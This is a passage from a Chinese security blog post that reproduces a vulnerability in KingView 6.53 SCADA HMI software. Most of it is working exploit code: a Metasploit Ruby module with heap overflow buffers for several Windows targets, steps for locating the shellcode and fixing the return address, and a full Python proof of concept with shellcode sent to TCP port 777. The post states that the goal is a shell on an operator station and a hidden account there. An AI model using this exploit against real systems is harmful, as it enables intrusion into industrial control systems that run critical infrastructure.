class="keyword">def</span> <span class="title">exploit</span></span></span><br><span class="line">		sploit = <span class="string">&#x27;&#x27;</span></span><br><span class="line">		<span class="keyword">if</span> target.name =~ <span class="regexp">/XP SP1/</span></span><br><span class="line"></span><br><span class="line">			sploit &lt;&lt; make_nops(<span class="number">32812</span>)</span><br><span class="line">			sploit &lt;&lt; <span class="string">&quot;\xEB\x10&quot;</span></span><br><span class="line">			sploit &lt;&lt; <span class="string">&quot;\x41&quot;</span>*<span class="number">6</span></span><br><span class="line">			sploit &lt;&lt; <span class="string">&quot;\xAD\xBB\xC3\x77&quot;</span></span><br><span class="line">			sploit &lt;&lt; [target.ret].pack(<span class="string">&#x27;V&#x27;</span>)</span><br><span class="line">			sploit &lt;&lt; make_nops(<span class="number">8</span>)</span><br><span class="line">			sploit &lt;&lt; payload.encoded</span><br><span class="line">			sploit &lt;&lt; <span class="string">&quot;\x44&quot;</span>*(<span class="number">1000</span>-payload.encoded.length)</span><br><span class="line">			<span class="comment">#this makes the app more crashy, need to investigatev</span></span><br><span class="line">			<span class="comment">#sploit &lt;&lt; make_nops(1000-payload.encoded.length) </span></span><br><span class="line"></span><br><span class="line">		<span class="keyword">elsif</span> target.name =~ <span class="regexp">/XP SP3/</span></span><br><span class="line"></span><br><span class="line">			sploit &lt;&lt; make_nops(<span class="number">1024</span>)</span><br><span class="line">			sploit &lt;&lt; payload.encoded</span><br><span class="line">			sploit &lt;&lt; <span class="string">&quot;\x44&quot;</span>*(<span class="number">31752</span>-payload.encoded.length)</span><br><span class="line">			<span class="comment">#rand_text_alpha_xxx() unfortunately makes it a bit unstable,</span></span><br><span class="line">			<span class="comment">#not ready to implement</span></span><br><span class="line">			<span class="comment">#sploit &lt;&lt; rand_text_alpha_upper(32776-sploit.length)</span></span><br><span class="line">			sploit &lt;&lt; [target.ret].pack(<span class="string">&#x27;V&#x27;</span>)</span><br><span class="line">		<span class="keyword">elsif</span> target.name =~ <span class="regexp">/2003 SP0/</span></span><br><span class="line"></span><br><span class="line">			sploit &lt;&lt; make_nops(<span class="number">1020</span>)</span><br><span class="line">			sploit &lt;&lt; <span class="string">&quot;ABCA&quot;</span></span><br><span class="line">			sploit &lt;&lt; payload.encoded</span><br><span class="line">			sploit &lt;&lt; <span class="string">&quot;\x44&quot;</span>*(<span class="number">31752</span>-payload.encoded.length)</span><br><span class="line">			sploit &lt;&lt; [target.ret].pack(<span class="string">&#x27;V&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">		<span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">		connect</span><br><span class="line"></span><br><span class="line">		print_status(<span class="string">&quot;Trying target <span class="subst">#&#123;target.name&#125;</span>&quot;</span>)</span><br><span class="line">		sock.write(sploit)</span><br><span class="line"></span><br><span class="line">		select(<span class="literal">nil</span>, <span class="literal">nil</span>, <span class="literal">nil</span>, <span class="number">5</span>)</span><br><span class="line">		handler</span><br><span class="line">		disconnect</span><br><span class="line"></span><br><span class="line">	<span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure>
<p>​        进入msf，重新 reaload module，可以看到新加入的目标代码已经加载。</p>
<p><img src="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z80ro7apj31g30sue82.jpg" alt="截屏2019-10-15下午7.06.12"></p>
<p>​        这里注意，一定要更换攻击方式，由原来的1变为2.</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set target <span class="number">2</span></span><br></pre></td></tr></table></figure>
<p><img src="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z82ue9dhj31g30suqv5.jpg" alt="截屏2019-10-15下午8.04.47"></p>
<p>​        再次攻击后，在memory中查找定位字符串位置 ABCA，如下图所示。（图中为我第一次设置的标志值ABCD，方法相同）</p>
<p><img src="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z846kebnj31g30suwht.jpg" alt="截屏2019-10-15下午7.29.11"></p>
<p>​        可以看到“ABCA”字符串在地址 0x00CD04C0 位置，并且􏰑payload需要在此基础上加4个字节，其实位置在 0x00CD04C4。</p>
<p><img src="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z8551rqjj31g30su0w1.jpg" alt="截屏2019-10-15下午8.08.37"></p>
<p>​        需根据上步骤定位出的 shellcode 位置来调整 Ret 的值，使得 eax + 0xC 指向输入数据包中的某个 4 字节数据。定位字符“ABCA”位 置是 0x00CD04C0，减去 0xC 得到 eax 寄存器的值为 0x00CD04C4，所以 Ret 的值为 0x00CD04C4。修改后的利用程序代码如下所示:</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">elsif</span> target.name =~ <span class="regexp">/2003 SP0/</span></span><br><span class="line">		</span><br><span class="line">		</span><br><span class="line">		sploit &lt;&lt; make_nops(<span class="number">1020</span>)</span><br><span class="line">		sploit &lt;&lt; <span class="string">&quot;\xC4\x04\xB4\x00&quot;</span></span><br><span class="line">		sploit &lt;&lt; payload.encoded</span><br><span class="line">		sploit &lt;&lt; <span class="string">&quot;\x44&quot;</span>*(<span class="number">31752</span>-payload.encoded.length)</span><br><span class="line">		sploit &lt;&lt; [target.ret].pack(<span class="string">&#x27;V&#x27;</span>)</span><br><span class="line">		</span><br><span class="line">		</span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure>
<p>​        再次利用可成功通过漏洞获取系统权限。</p>
<p><img src="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z89ajgtjj31g30su4qq.jpg" alt="截屏2019-10-15下午8.31.37"></p>
<h2 id="预期结果"><a href="#预期结果" class="headerlink" title="预期结果"></a><strong>预期结果</strong></h2><p>​        成功获取win 2003 操作员站的shell，并可以在操作员站建立隐蔽账号。</p>
<h2 id="PLUS"><a href="#PLUS" class="headerlink" title="PLUS"></a>PLUS</h2><p>​        尝试通过Python脚本的方式进行 EXP 编写进行手工测试。</p>
<p>​        下面给出一个参考：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">## Exploit Title: KingView 6.53 SCADA HMI Heap Overflow PoC</span></span><br><span class="line"><span class="comment">## Date: 9/28/2010</span></span><br><span class="line"><span class="comment">## Author: Dillon Beresford</span></span><br><span class="line"><span class="comment">## Software Link: http://download.kingview.com/software/kingview%20English%20Version/kingview6.53_EN.rar</span></span><br><span class="line"><span class="comment">## Version: 6.53 (English)</span></span><br><span class="line"><span class="comment">## Tested on: Windows XP SP1 ( works on SP2 and SP3 ) will release new targets after CERT advisory is public. </span></span><br><span class="line"></span><br><span class="line"><span class="comment">## Shouts to HD Moore JDuck, Egyp7, todb, |)ruid, nate and the rest of the AHA! crew.</span></span><br><span class="line"><span class="comment">## Thanks to all who share knowledge about heap smashing and heap bypass techniques.</span></span><br><span class="line"></span><br><span class="line"><span class="comment">## Notified CERT and the vendor, CERT notified the vendor as well, vendor never responded.</span></span><br><span class="line"><span class="comment">## No patch or response from vendor as of 1/9/2011</span></span><br><span class="line"><span class="comment">## Lets get this into the wild and see how long it takes them to respond.</span></span><br><span class="line"></span><br><span class="line"><span class="comment">## Looks like persistence pays off. :-)</span></span><br><span class="line"></span><br><span class="line"><span class="comment">## SP2/SP3 targets will be available soon. (putting into metasploit this is just a poc to get response from vendor).</span></span><br><span class="line"><span class="comment">## Vendor: Beijing WellinControl Technology Development Co.,Ltd </span></span><br><span class="line"><span class="comment">## http://www.wellintek.com</span></span><br><span class="line"></span><br><span class="line"><span class="comment">## Beijing WellinControl Technology Development and CHINA CERT were notified on Tue, Sep 28, 2010 at 6:31 AM</span></span><br><span class="line"><span class="comment">## I have made every attempt and yet they choose to ignore...</span></span><br><span class="line"><span class="comment">## This PoC should wake up the dragon. &gt;:-]</span></span><br><span class="line"><span class="comment">## With more to come!</span></span><br><span class="line"></span><br><span class="line"><span class="comment">## KingView software is a high-pormance production which can be used to building a data information </span></span><br><span class="line"><span class="comment">## service platform in automatic field. KingView software can provid graphic visualization which takes </span></span><br><span class="line"><span class="comment">## your operations management, control and optimization . KingView is widely used in power, </span></span><br><span class="line"><span class="comment">## water conservancy,buildings, coalmine, environmental protection, metallurgy and so on. </span></span><br><span class="line"><span class="comment">## And now KingView software is used in national defense, Aero-Space in China. </span></span><br><span class="line"></span><br><span class="line"><span class="comment">## Notes: The HistorySrv process listens on TCP port 777 </span></span><br><span class="line"><span class="comment">## This process does not require any authentication from clients</span></span><br><span class="line"></span><br><span class="line"><span class="comment">## An attacker could replace the Flink and Blink pointers with evil ones.. Herrow srweeping dragon. </span></span><br><span class="line"></span><br><span class="line"><span class="comment">## Windows XP SP1 (x86) </span></span><br><span class="line"><span class="comment">## CommandLine: &quot;C:\Program Files\Kingview\HistorySvr.exe&quot;</span></span><br><span class="line"><span class="comment">## eax=00241eb4 ebx=7ffdf000 ecx=00000003 edx=77f6eb08 esi=00241eb4 edi=00241f48</span></span><br><span class="line"><span class="comment">## eip=77f767cd esp=0012fb38 ebp=0012fc2c iopl=0         nv up ei pl nz na po nc</span></span><br><span class="line"><span class="comment">## cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202</span></span><br><span class="line"><span class="comment">## ntdll!DbgBreakPoint:</span></span><br><span class="line"><span class="comment">## 77f767cd cc              int     3</span></span><br><span class="line"><span class="comment">## 0:000&gt; g</span></span><br><span class="line"><span class="comment">## ModLoad: 71950000 71a34000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805\comctl32.dll</span></span><br><span class="line"><span class="comment">## ModLoad: 5ad70000 5ada4000   C:\WINDOWS\System32\uxtheme.dll</span></span><br><span class="line"><span class="comment">## ModLoad: 71a50000 71a8b000   C:\WINDOWS\system32\mswsock.dll</span></span><br><span class="line"><span class="comment">## ModLoad: 71a90000 71a98000   C:\WINDOWS\System32\wshtcpip.dll</span></span><br><span class="line"><span class="comment">## (318.6d4): Access violation - code c0000005 (first chance)</span></span><br><span class="line"><span class="comment">## First chance exceptions are reported before any exception handling.</span></span><br><span class="line"><span class="comment">## This exception may be expected and handled.</span></span><br><span class="line"><span class="comment">## eax=42424242 ebx=00000285 ecx=44444444 edx=00d38110 esi=00d38110 edi=003a0000</span></span><br><span class="line"><span class="comment">## eip=77f6256f esp=0012f36c ebp=0012f584 iopl=0         nv up ei pl zr na pe nc</span></span><br><span class="line"><span class="comment">## cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246</span></span><br><span class="line"><span class="comment">## ntdll!RtlAllocateHeapSlowly+0x6bd:</span></span><br><span class="line"><span class="comment">## 77f6256f 8901            mov     dword ptr [ecx],eax  ds:0023:44444444=????????</span></span><br><span class="line"><span class="comment">## 0:000&gt; u</span></span><br><span class="line"><span class="comment">## ntdll!RtlAllocateHeapSlowly+0x6bd:</span></span><br><span class="line"><span class="comment">## 77f6256f 8901            mov     dword ptr [ecx],eax</span></span><br><span class="line"><span class="comment">## 77f62571 894804          mov     dword ptr [eax+4],ecx</span></span><br><span class="line"><span class="comment">## 77f62574 3bc1            cmp     eax,ecx</span></span><br><span class="line"><span class="comment">## 77f62576 7534            jne     ntdll!RtlAllocateHeapSlowly+0x6fa (77f625ac)</span></span><br><span class="line"><span class="comment">## 77f62578 668b06          mov     ax,word ptr [esi]</span></span><br><span class="line"><span class="comment">## 77f6257b 663d8000        cmp     ax,80h</span></span><br><span class="line"><span class="comment">## 77f6257f 732b            jae     ntdll!RtlAllocateHeapSlowly+0x6fa (77f625ac)</span></span><br><span class="line"><span class="comment">## 77f62581 0fb7c8          movzx   ecx,ax</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">## usage python exploit.py 127.0.0.1 777</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line">host = sys.argv[<span class="number">1</span>]</span><br><span class="line">port = <span class="built_in">int</span>(sys.argv[<span class="number">2</span>])</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> <span class="string">&quot; KingView 6.53 SCADA HMI Heap Smashing Exploit &quot;</span></span><br><span class="line"><span class="built_in">print</span> <span class="string">&quot; Credits: D1N | twitter.com/D1N &quot;</span></span><br><span class="line"></span><br><span class="line">shellcode = (<span class="string">&quot;\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9&quot;</span></span><br><span class="line"><span class="string">&quot;\x44\x80\xc2\x77&quot;</span> </span><br><span class="line"><span class="string">&quot;\xFF\xD1\x90\x90&quot;</span>) </span><br><span class="line"></span><br><span class="line">exploit = (<span class="string">&quot;\x90&quot;</span> * <span class="number">1024</span> + <span class="string">&quot;\x44&quot;</span> * <span class="number">31788</span>) </span><br><span class="line">exploit += (<span class="string">&quot;\xeb\x14&quot;</span>) <span class="comment"># our JMP (over the junk and into nops) </span></span><br><span class="line">exploit += (<span class="string">&quot;\x44&quot;</span> * <span class="number">6</span>) </span><br><span class="line">exploit += (<span class="string">&quot;\xad\xbb\xc3\x77&quot;</span>) <span class="comment"># ECX 0x77C3BBAD --&gt; call dword ptr ds:[EDI+74] </span></span><br><span class="line">exploit += (<span class="string">&quot;\xb4\x73\xed\x77&quot;</span>) <span class="comment"># EAX 0x77ED73B4 --&gt; UnhandledExceptionFilter() </span></span><br><span class="line">exploit += (<span class="string">&quot;\x90&quot;</span> * <span class="number">21</span>) </span><br><span class="line">exploit += shellcode</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> <span class="string">&quot;  [+] Herrow Sweeping Dragon...&quot;</span></span><br><span class="line"><span class="built_in">print</span> <span class="string">&quot;  [+] Sending payload...&quot;</span></span><br><span class="line"></span><br><span class="line">s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  </span><br><span class="line">s.connect((host,port)) </span><br><span class="line">s.send(exploit)  </span><br><span class="line">data = s.recv(<span class="number">1024</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> <span class="string">&quot;  [+] Closing connection..&quot;</span> </span><br><span class="line">s.close()  </span><br><span class="line"><span class="built_in">print</span> <span class="string">&quot;  [+] Done!&quot;</span> </span><br></pre></td></tr></table></figure>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2021/01/26/%EF%BC%88%E5%B7%A5%E6%8E%A7%E5%90%91%EF%BC%89%E7%BB%84%E6%80%81%E7%8E%8B%E8%BD%AF%E4%BB%B6%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95%E9%AA%8C%E8%AF%81%E4%B8%8E%E5%88%A9%E7%94%A8/" data-id="ckkdfy1j400001pyr9oh74mpj" data-title="（工控向）组态王软件漏洞测试验证与利用" class="article-share-link">Share</a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag">漏洞复现</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2021/01/25/%E3%80%8A%E9%BB%91%E5%AE%A2%E5%A4%A7%E6%9B%9D%E5%85%89-%E5%B7%A5%E6%8E%A7%E5%AE%89%E5%85%A8%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">（读书笔记）工业控制系统安全概述</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/web/">web</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%BA%8C%E8%BF%9B%E5%88%B6/">二进制</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%85%B6%E4%BB%96/">其他</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%B7%A5%E6%8E%A7/">工控</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%9D%82%E9%A1%B9/">杂项</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/AFL/" rel="tag">AFL</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/BugID/" rel="tag">BugID</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Docker/" rel="tag">Docker</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Fuzzing/" rel="tag">Fuzzing</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/MacbookPro/" rel="tag">MacbookPro</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Modbus/" rel="tag">Modbus</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Sql/" rel="tag">Sql</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/clusterfuzz/" rel="tag">clusterfuzz</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/fuzz/" rel="tag">fuzz</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/libFuzzer/" rel="tag">libFuzzer</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/rabbitMQ/" rel="tag">rabbitMQ</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E4%B8%AA%E4%BA%BA%E6%80%BB%E7%BB%93/" rel="tag">个人总结</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8A%A0%E5%A3%B3%E8%84%B1%E5%A3%B3/" rel="tag">加壳脱壳</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8F%8D%E8%B0%83%E8%AF%95/" rel="tag">反调试</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%9B%BA%E4%BB%B6%E9%80%86%E5%90%91/" rel="tag">固件逆向</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%B0%8F%E8%84%9A%E6%9C%AC/" rel="tag">小脚本</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%B7%A5%E6%8E%A7%E5%8D%8F%E8%AE%AE/" rel="tag">工控协议</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" rel="tag">漏洞分析</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag">漏洞复现</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/" rel="tag">漏洞挖掘</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%97%85%E6%AF%92%E5%88%86%E6%9E%90/" rel="tag">病毒分析</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%BB%83%E5%AD%97/" rel="tag">练字</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%8A%B1%E6%8C%87%E4%BB%A4/" rel="tag">花指令</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%AE%BA%E6%96%87/" rel="tag">论文</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%AE%BA%E6%96%87%E9%98%85%E8%AF%BB/" rel="tag">论文阅读</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0/" rel="tag">读书笔记</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/AFL/" style="font-size: 10px;">AFL</a> <a href="/tags/BugID/" style="font-size: 10px;">BugID</a> <a href="/tags/Docker/" style="font-size: 10px;">Docker</a> <a href="/tags/Fuzzing/" style="font-size: 10px;">Fuzzing</a> <a href="/tags/MacbookPro/" style="font-size: 10px;">MacbookPro</a> <a href="/tags/Modbus/" style="font-size: 10px;">Modbus</a> <a href="/tags/Sql/" style="font-size: 10px;">Sql</a> <a href="/tags/clusterfuzz/" style="font-size: 10px;">clusterfuzz</a> <a href="/tags/fuzz/" style="font-size: 15px;">fuzz</a> <a href="/tags/libFuzzer/" style="font-size: 10px;">libFuzzer</a> <a href="/tags/rabbitMQ/" style="font-size: 10px;">rabbitMQ</a> <a href="/tags/%E4%B8%AA%E4%BA%BA%E6%80%BB%E7%BB%93/" style="font-size: 20px;">个人总结</a> <a href="/tags/%E5%8A%A0%E5%A3%B3%E8%84%B1%E5%A3%B3/" style="font-size: 10px;">加壳脱壳</a> <a href="/tags/%E5%8F%8D%E8%B0%83%E8%AF%95/" style="font-size: 10px;">反调试</a> <a href="/tags/%E5%9B%BA%E4%BB%B6%E9%80%86%E5%90%91/" style="font-size: 10px;">固件逆向</a> <a href="/tags/%E5%B0%8F%E8%84%9A%E6%9C%AC/" style="font-size: 10px;">小脚本</a> <a href="/tags/%E5%B7%A5%E6%8E%A7%E5%8D%8F%E8%AE%AE/" style="font-size: 10px;">工控协议</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" style="font-size: 11.67px;">漏洞分析</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" style="font-size: 18.33px;">漏洞复现</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/" style="font-size: 13.33px;">漏洞挖掘</a> <a href="/tags/%E7%97%85%E6%AF%92%E5%88%86%E6%9E%90/" style="font-size: 10px;">病毒分析</a> <a href="/tags/%E7%BB%83%E5%AD%97/" style="font-size: 10px;">练字</a> <a href="/tags/%E8%8A%B1%E6%8C%87%E4%BB%A4/" style="font-size: 10px;">花指令</a> <a href="/tags/%E8%AE%BA%E6%96%87/" style="font-size: 11.67px;">论文</a> <a href="/tags/%E8%AE%BA%E6%96%87%E9%98%85%E8%AF%BB/" style="font-size: 10px;">论文阅读</a> <a href="/tags/%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0/" style="font-size: 16.67px;">读书笔记</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/01/">January 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">October 2019</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2021/01/26/%EF%BC%88%E5%B7%A5%E6%8E%A7%E5%90%91%EF%BC%89%E7%BB%84%E6%80%81%E7%8E%8B%E8%BD%AF%E4%BB%B6%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95%E9%AA%8C%E8%AF%81%E4%B8%8E%E5%88%A9%E7%94%A8/">（工控向）组态王软件漏洞测试验证与利用</a>
          </li>
        
          <li>
            <a href="/2021/01/25/%E3%80%8A%E9%BB%91%E5%AE%A2%E5%A4%A7%E6%9B%9D%E5%85%89-%E5%B7%A5%E6%8E%A7%E5%AE%89%E5%85%A8%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0/">（读书笔记）工业控制系统安全概述</a>
          </li>
        
          <li>
            <a href="/2021/01/25/%E5%A0%86%E7%9A%84%E7%9F%A5%E8%AF%86%E4%B8%8E%E5%88%A9%E7%94%A8/">堆的知识与利用（0day2）</a>
          </li>
        
          <li>
            <a href="/2021/01/25/%E5%8F%8D%E8%B0%83%E8%AF%95/">反调试初步学习总结与简单实战</a>
          </li>
        
          <li>
            <a href="/2021/01/25/%E5%B7%A5%E6%8E%A7%E7%B3%BB%E7%BB%9F%E5%A8%81%E8%83%81%E5%BB%BA%E6%A8%A1/">（读书笔记）通过威胁建模获取具有可操作性的工控系统威胁情报</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2021 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>